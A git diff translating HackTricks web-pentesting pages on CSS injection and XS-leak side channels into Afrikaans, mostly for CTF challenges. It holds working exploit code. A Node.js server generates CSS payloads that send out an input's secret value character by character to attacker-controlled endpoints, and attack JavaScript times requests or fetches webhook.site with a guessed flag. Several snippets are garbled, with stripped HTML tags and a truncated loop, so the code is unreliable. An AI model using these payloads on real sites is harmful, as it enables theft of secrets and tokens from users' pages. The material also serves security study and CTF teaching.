-### Text node exfiltration (III): leaking the charset with a default font by hiding elements (not requiring external assets) 
+**Verwysing:** Dit word genoem as ['n onsuksesvolle oplossing in hierdie verslag](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
 
-**Reference:** This is mentioned as [an unsuccessful solution in this writeup](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
+Hierdie geval is baie soortgelyk aan die vorige een, maar in hierdie geval is die doel om spesifieke karakters groter as ander te maak om iets te verberg, soos 'n knoppie wat nie deur die robot gedruk moet word nie of 'n prent wat nie gelaai sal word nie. So ons kan die aksie (of die gebrek aan aksie) meet en weet of 'n spesifieke karakter in die teks voorkom.
 
-This case is very similar to the previous one, however, in this case the goal of making specific **chars bigger than other is to hide something** like a button to not be pressed by the bot or a image that won't be loaded. So we could measure the action (or lack of the action) and know if a specific char is present inside the text.
+### Teksnodus-uitlek (III): lek van die tekenstel deur middel van kasstyd (vereis nie eksterne bates nie) 
 
-### Text node exfiltration (III): leaking the charset by cache timing (not requiring external assets) 
-
-**Reference:** This is mentioned as [an unsuccessful solution in this writeup](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
-
-In this case, we could try to leak if a char is in the text by loading a fake font from the same origin:
+**Verwysing:** Dit word genoem as ['n onsuksesvolle oplossing in hierdie verslag](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
 
+In hierdie geval kan ons probeer om uit te lek of 'n karakter in die teks voorkom deur 'n vals lettertipe van dieselfde oorsprong te laai:
 ```css
 @font-face {
-  font-family: "A1";
-  src: url(/static/bootstrap.min.css?q=1);
-  unicode-range: U+0041;
+font-family: "A1";
+src: url(/static/bootstrap.min.css?q=1);
+unicode-range: U+0041;
 }
 ```
+Indien daar 'n ooreenstemming is, sal die **lettertipe gelaai word vanaf `/static/bootstrap.min.css?q=1`**. Alhoewel dit nie suksesvol gelaai sal word nie, moet die **blaaier dit in die skyfgeheue stoor**, en selfs as daar geen skyfgeheue is nie, is daar 'n **304 nie gewysigde** meganisme, sodat die **reaksie vinniger moet wees** as ander dinge.
 
-If there is a match, the **font will be loaded from `/static/bootstrap.min.css?q=1`**. Although it won’t load successfully, the **browser should cache it**, and even if there is no cache, there is a **304 not modified** mechanism, so the **response should be faster** than other things.
+Maar as die tydverskil tussen die gekeëerde reaksie en die nie-gekeëerde een nie groot genoeg is nie, sal dit nie nuttig wees nie. Byvoorbeeld, die outeur het genoem: Na toetsing het ek egter bevind dat die eerste probleem is dat die spoed nie veel verskil nie, en die tweede probleem is dat die robot die `disk-cache-size=1` vlag gebruik, wat werklik deurdag is.
 
-However, if the time difference of the cached response from the non-cached one isn't big enough, this won't be useful. For example, the author mentioned: However, after testing, I found that the first problem is that the speed is not much different, and the second problem is that the bot uses the `disk-cache-size=1` flag, which is really thoughtful.
+### Teksknoop uitlek (III): lek van die karakterstel deur die tyd te meet wanneer honderde plaaslike "lettertipes" gelaai word (sonder eksterne bates) 
 
-### Text node exfiltration (III): leaking the charset by timing loading hundreds of local "fonts" (not requiring external assets) 
-
-**Reference:** This is mentioned as [an unsuccessful solution in this writeup](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
-
-In this case you can indicate **CSS to load hundreds of fake fonts** from the same origin when a match occurs. This way you can **measure the time** it takes and find out if a char appears or not with something like:
+**Verwysing:** Dit word genoem as ['n onsuksesvolle oplossing in hierdie skryfstuk](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
 
+In hierdie geval kan jy **CSS aandui om honderde vals lettertipes** van dieselfde oorsprong te laai wanneer 'n ooreenstemming plaasvind. Op hierdie manier kan jy die **tyd meet** wat dit neem en uitvind of 'n karakter verskyn of nie met iets soos:
 ```css
 @font-face {
-  font-family: "A1";
-  src: url(/static/bootstrap.min.css?q=1), 
-    url(/static/bootstrap.min.css?q=2),
-    ....
-    url(/static/bootstrap.min.css?q=500);
-  unicode-range: U+0041;
+font-family: "A1";
+src: url(/static/bootstrap.min.css?q=1),
+url(/static/bootstrap.min.css?q=2),
+....
+url(/static/bootstrap.min.css?q=500);
+unicode-range: U+0041;
 }
 ```
-
-And the bot’s code looks like this:
-
+En die kode van die bot lyk soos volg:
 ```python
 browser.get(url)
 WebDriverWait(browser, 30).until(lambda r: r.execute_script('return document.readyState') == 'complete')
 time.sleep(30)
 ```
+So, as die lettertipe nie ooreenstem nie, word verwag dat die responstyd wanneer die bot besoek word, ongeveer 30 sekondes sal wees. As daar egter 'n lettertipe-ooreenkoms is, sal verskeie versoek na die lettertipe gestuur word, wat veroorsaak dat die netwerk voortdurende aktiwiteit het. As gevolg hiervan sal dit langer neem om aan die stopvoorwaarde te voldoen en die respons te ontvang. Daarom kan die responstyd gebruik word as 'n aanduiding om vas te stel of daar 'n lettertipe-ooreenkoms is.
 
-So, if the font does not match, the response time when visiting the bot is expected to be approximately 30 seconds. However, if there is a font match, multiple requests will be sent to retrieve the font, causing the network to have continuous activity. As a result, it will take longer to satisfy the stop condition and receive the response. Therefore, the response time can be used as an indicator to determine if there is a font match.
-
-## References
+## Verwysings
 
 * [https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e](https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e)
 * [https://d0nut.medium.com/better-exfiltration-via-html-injection-31c72a2dae8b](https://d0nut.medium.com/better-exfiltration-via-html-injection-31c72a2dae8b)
@@ -483,14 +457,14 @@ So, if the font does not match, the response time when visiting the bot is expec
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

diff --git a/pentesting-web/xs-search/css-injection/css-injection-code.md b/pentesting-web/xs-search/css-injection/css-injection-code.md
index e288681dd..aa064a1f0 100644
--- a/pentesting-web/xs-search/css-injection/css-injection-code.md
+++ b/pentesting-web/xs-search/css-injection/css-injection-code.md
@@ -1,22 +1,22 @@
-# CSS Injection Code
+# CSS Injeksie Kode
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
 
 

 
 

 
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
+Vind kwesbaarhede wat die belangrikste is sodat jy hulle vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
 
 {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
 
@@ -26,14 +26,12 @@ Find vulnerabilities that matter most so you can fix them faster. Intruder track
 ```html
 
 
-    

+

 
 
 ```
-{% endcode %}
-
 {% code title="server.js" %}
 ```javascript
 const http = require('http');
@@ -50,82 +48,82 @@ var pending = [];
 var stop = false, ready = 0, n = 0;
 
 const requestHandler = (request, response) => {
-    let req = url.parse(request.url, url);
-    log('\treq: %s', request.url);
-    
-    //If stop, leakeage is finished
-    if (stop) return response.end();
-    
-    switch (req.pathname) {
-        // This only launched when starting the leakeage
-        case "/start":
-            genResponse(response);
-            break;
-        
-        // Everytime something is leaked
-        case "/leak":
-            response.end();
-            // If response comes with a pre, then we leaked some preffix s(E)cret
-            if (req.query.pre && prefix !== req.query.pre) {
-                prefix = req.query.pre;
-            
-            // If response comes with a post, then we leaked some suffix secre(T)
-            } else if (req.query.post && postfix !== req.query.post) {
-               postfix = req.query.post;
-            } else {
-                break;
-            }
-            
-            // Always a pre and a post response must arrived before responding the "next" @import (which is waiting for response)
-            if (ready == 2) {
-                genResponse(pending.shift());
-                ready = 0;
-            } else {
-                ready++;
-                log('\tleak: waiting others...');
-            }
-            break;
-        
-        // While waiting for a pre and a post, the next @import is waiting to be responded
-        // by a new generated payload with another "pre" and "post"
-        case "/next":
-            if (ready == 2) {
-                genResponse(respose);
-                ready = 0;
-            } else {
-                pending.push(response);
-                ready++;
-                log('\tquery: waiting others...');
-            }
-            break;
-        
-        // Called when the secret is leaked
-        case "/end":
-            stop = true;
-            console.log('[+] END: %s', req.query.token);
-        
-        default:
-            response.end();
-    }
+let req = url.parse(request.url, url);
+log('\treq: %s', request.url);
+
+//If stop, leakeage is finished
+if (stop) return response.end();
+
+switch (req.pathname) {
+// This only launched when starting the leakeage
+case "/start":
+genResponse(response);
+break;
+
+// Everytime something is leaked
+case "/leak":
+response.end();
+// If response comes with a pre, then we leaked some preffix s(E)cret
+if (req.query.pre && prefix !== req.query.pre) {
+prefix = req.query.pre;
+
+// If response comes with a post, then we leaked some suffix secre(T)
+} else if (req.query.post && postfix !== req.query.post) {
+postfix = req.query.post;
+} else {
+break;
+}
+
+// Always a pre and a post response must arrived before responding the "next" @import (which is waiting for response)
+if (ready == 2) {
+genResponse(pending.shift());
+ready = 0;
+} else {
+ready++;
+log('\tleak: waiting others...');
+}
+break;
+
+// While waiting for a pre and a post, the next @import is waiting to be responded
+// by a new generated payload with another "pre" and "post"
+case "/next":
+if (ready == 2) {
+genResponse(respose);
+ready = 0;
+} else {
+pending.push(response);
+ready++;
+log('\tquery: waiting others...');
+}
+break;
+
+// Called when the secret is leaked
+case "/end":
+stop = true;
+console.log('[+] END: %s', req.query.token);
+
+default:
+response.end();
+}
 }
 
 const genResponse = (response) => {
-    // Verbose output to know what do we know
-    console.log('...pre-payoad: ' + prefix);
-    console.log('...post-payoad: ' + postfix);
+// Verbose output to know what do we know
+console.log('...pre-payoad: ' + prefix);
+console.log('...post-payoad: ' + postfix);
 
-    // Payload generation, you have an example of what is generated below
-    let css = '@import url('+ HOSTNAME + '/next?' + Math.random() + ');\n' +
-        [0,1,2,3,4,5,6,7,8,9,'a','b','c','d','e','f'].map(e => ('input[value$="' + e + postfix + '"]{--e'+n+':url(' + HOSTNAME + '/leak?post=' + e + postfix + ')}')).join('') +
-        'div '.repeat(n) + 'input{background:var(--e'+n+')}' +
-        [0,1,2,3,4,5,6,7,8,9,'a','b','c','d','e','f'].map(e => ('input[value^="' + prefix + e + '"]{--s'+n+':url(' + HOSTNAME + '/leak?pre=' + prefix + e +')}')).join('') +
-        'div '.repeat(n) + 'input{border-image:var(--s'+n+')}' +
-        'input[value='+ prefix + postfix + ']{list-style:url(' + HOSTNAME + '/end?token=' + prefix + postfix + '&)};';
-    
-    response.writeHead(200, { 'Content-Type': 'text/css'});
-    response.write(css);
-    response.end();
-    n++;
+// Payload generation, you have an example of what is generated below
+let css = '@import url('+ HOSTNAME + '/next?' + Math.random() + ');\n' +
+[0,1,2,3,4,5,6,7,8,9,'a','b','c','d','e','f'].map(e => ('input[value$="' + e + postfix + '"]{--e'+n+':url(' + HOSTNAME + '/leak?post=' + e + postfix + ')}')).join('') +
+'div '.repeat(n) + 'input{background:var(--e'+n+')}' +
+[0,1,2,3,4,5,6,7,8,9,'a','b','c','d','e','f'].map(e => ('input[value^="' + prefix + e + '"]{--s'+n+':url(' + HOSTNAME + '/leak?pre=' + prefix + e +')}')).join('') +
+'div '.repeat(n) + 'input{border-image:var(--s'+n+')}' +
+'input[value='+ prefix + postfix + ']{list-style:url(' + HOSTNAME + '/end?token=' + prefix + postfix + '&)};';
+
+response.writeHead(200, { 'Content-Type': 'text/css'});
+response.write(css);
+response.end();
+n++;
 }
 
 
@@ -133,14 +131,14 @@ const genResponse = (response) => {
 const server = http.createServer(requestHandler)
 
 server.listen(port, (err) => {
-    if (err) {
-        return console.log('[-] Error: something bad happened', err);
-    }
-    console.log('[+] Server is listening on %d', port);
+if (err) {
+return console.log('[-] Error: something bad happened', err);
+}
+console.log('[+] Server is listening on %d', port);
 })
 
 function log() {
-    if (DEBUG) console.log.apply(console, arguments);
+if (DEBUG) console.log.apply(console, arguments);
 }
 
 /*
@@ -232,25 +230,24 @@ input[value^="f"]{--s0:url(http://localhost:5001/leak?pre=f)}
 input{border-image:var(--s0)}
 input[value=]{list-style:url(http://localhost:5001/end?token=&)};
 */
-```
 {% endcode %}
 
 

 
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
+Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
 
 {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
 
 

diff --git a/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md b/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md
index aee47f77d..5b1e1ea35 100644
--- a/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md
+++ b/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md
@@ -1,165 +1,163 @@
-# Event Loop Blocking + Lazy images
+# Event Loop Blokkering + Luie beelde
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 

 
-In [**this exploit**](https://gist.github.com/aszx87410/155f8110e667bae3d10a36862870ba45), [**@aszx87410**](https://twitter.com/aszx87410) mixes the **lazy image side channel** technique through a HTML injection with kind of **event loop blocking technique** to leak chars.
+In [**hierdie uitbuiting**](https://gist.github.com/aszx87410/155f8110e667bae3d10a36862870ba45), meng [**@aszx87410**](https://twitter.com/aszx87410) die **luie beeld sykanaal**-tegniek deur 'n HTML-injeksie met 'n soort **event loop blokkeringstegniek** om karakters te lek.
 
-This is a **different exploit for the CTF chall** that was already commented in the following page. take a look for more info about the challenge:
+Dit is 'n **verskillende uitbuiting vir die CTF-uitdaging** wat reeds bespreek is op die volgende bladsy. Kyk vir meer inligting oor die uitdaging:
 
 {% content-ref url="connection-pool-example.md" %}
 [connection-pool-example.md](connection-pool-example.md)
 {% endcontent-ref %}
 
-The idea behind this exploit is:
+Die idee agter hierdie uitbuiting is as volg:
 
-* The posts are loaded alphabetically
-* An **attacker** can **inject** a **post** starting with **"A"**, then some **HTML tag** (like a big **`
 
 
 
-  
-  
-  
-  

-    
-  

-  
-  
-  

-    
-  

-  
-  
+}, 0)
+
+async function testChar(str) {
+return new Promise(resolve => {
+/*
+For 3350, you need to test it on your local to get this number.
+The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading threshold
+If starts with "A", the image should be loaded because it's in the threshold.
+*/
+//  is experimental and allow to show the injected
+// images when the post injected is the first one but to hide them when
+// the injected post is after the post with the flag
+inp.value = str + '

'+Array.from({length:20}).map((_,i)=>``).join('')
+f.submit()
+
+setTimeout(() => {
+run(str, resolve)
+}, 500)
+})
+}
+
+async function run(str, resolve) {
+// Open posts page 5 times
+for(let i=1; i<=5;i++) {
+window.open(TARGET)
+}
+
+let t = 0
+const round = 30 //Lets time 30 requests
+setTimeout(async () => {
+// Send 30 requests and time each
+for(let i=0; i1)
+let end = performance.now()
+t += end - s
+console.log(end - s)
+}
+const avg = t/round
+// Send info about how much time it took
+send(str + "," + t + "," + "avg:" + avg)
+
+/*
+I get this threshold(1000ms) by trying multiple times on remote admin bot
+for example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold
+*/
+const isFound = (t >= 1000)
+if (isFound) {
+inp2.value = "0"
+} else {
+inp2.value = "1"
+}
+
+// remember to delete the post to not break our leak oracle
+f2.submit()
+setTimeout(() => {
+resolve(isFound)
+}, 200)
+}, 200)
+}
+
+
 
 
 ```
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 

diff --git a/pentesting-web/xs-search/javascript-execution-xs-leak.md b/pentesting-web/xs-search/javascript-execution-xs-leak.md
index 035ff8782..bea9ff51c 100644
--- a/pentesting-web/xs-search/javascript-execution-xs-leak.md
+++ b/pentesting-web/xs-search/javascript-execution-xs-leak.md
@@ -1,92 +1,88 @@
-# JavaScript Execution XS Leak
+# JavaScript Uitvoering XS-lek
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
 
 

-
 ```javascript
 // Code that will try ${guess} as flag (need rest of the server code
 app.get('/guessing', function(req, res) {
-    let guess = req.query.guess
-    let page = `
-                
-                    
-                    
-                
-                
hello2

-                `
-    res.send(page)
+let guess = req.query.guess
+let page = `
+
+
+
+
+
hello2

+`
+res.send(page)
 });
 ```
-
-Main page that generates iframes to the previous `/guessing` page to test each possibility
-
+Hoofblad wat iframes genereer na die vorige `/raai` bladsy om elke moontlikheid te toets
 ```html
 
 
-    
+timerId = setInterval(() => {
+if (candidateIsGood) {
+flag = candidate
+guessIndex = -1
+fetch('https://webhook.site/?flag='+flag)
+}
+
+//Start with true and will be change to false if wrong
+candidateIsGood = true
+guessIndex++
+if (guessIndex >= flagChars.length) {
+fetch('https://webhook.site/')
+return
+}
+let guess = flagChars[guessIndex]
+candidate = flag + guess
+let iframe = ``
+console.log('iframe: ', iframe)
+hack.innerHTML = iframe
+}
+, 500);
+
 
 
hello

 

 

 
 ```
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
